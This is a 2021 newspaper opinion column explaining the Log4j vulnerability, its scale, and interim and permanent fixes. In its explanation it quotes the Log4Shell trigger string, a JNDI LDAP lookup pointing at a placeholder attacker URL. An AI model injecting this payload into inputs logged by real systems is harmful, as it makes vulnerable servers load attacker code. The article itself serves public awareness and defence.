DAWN.COM

Today's Paper | November 02, 2024

Updated 27 Dec, 2021 08:26am

Log4j — a catastrophic internet security flaw

The information technology industry is facing a Covid-like situation in its security realm due to Log4j vulnerability. Fear is that international hackers are already active in exploiting the breach in security.

The US Department of Homeland Security is raising a severe alarm, urging federal agencies to swiftly erase the issue since it’s so easy to be exploited — and telling those with public-facing networks to put up firewalls if they can’t be sure. The impacted software is modest and sometimes undocumented.

Detected in a frequently used program called Log4j, the exploit lets internet-based attackers rapidly grab control of everything from industrial control systems to web servers and consumer devices. Simply detecting which computers utilise the utility is a challenge; it is sometimes concealed under layers of other applications.

According to some estimations, up to 3bn systems and 44pc of organisations could be potentially compromised by the Log4j issue.

Those readers who are IT specialists, might be wondering what is Log4j vulnerability? For them, the quick answer is, it is like the SAQL injection, a familiar vulnerability of the past. The code snippet (${jndi:ldap://[attacker_URL]}) might look familiar to software developers familiar with code injections.

Log4j is a Java library that is used for logging errors and other software activities. All an attacker has to do, to exploit the flaw, is strategically send a malicious code string that eventually gets logged by Log4j affected version. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

According to some estimations, up to 3 billion systems and 44 per cent of organisations could be potentially compromised by the Log4j issue. Millions of attempts by hackers have been logged on numerous networks. If anything, it’s now achingly evident that Log4Shell will continue to wreak havoc across the internet for years to come.

While this is a high-severity vulnerability, it takes a very specific configuration to exploit. In case your organisation is affected, one quick fix could be to modify the Gradle or Maven configuration files to prevent the use of the affected version of Log4j library, while you look for a permanent fix. A comprehensive way to solve this issue is to upgrade to a corrected version of Log4J, above 2.16. The good news is that just like Covid, we will come out of it sooner, not later, as numerous teams of experts are working day and night to repair the issue.

The writer is an IT professional, trained in the USA

Published in Dawn, The Business and Finance Weekly, December 27th, 2021

Read Comments

PIA stake sale attracts sole bid of Rs10 billion below government minimum Next Story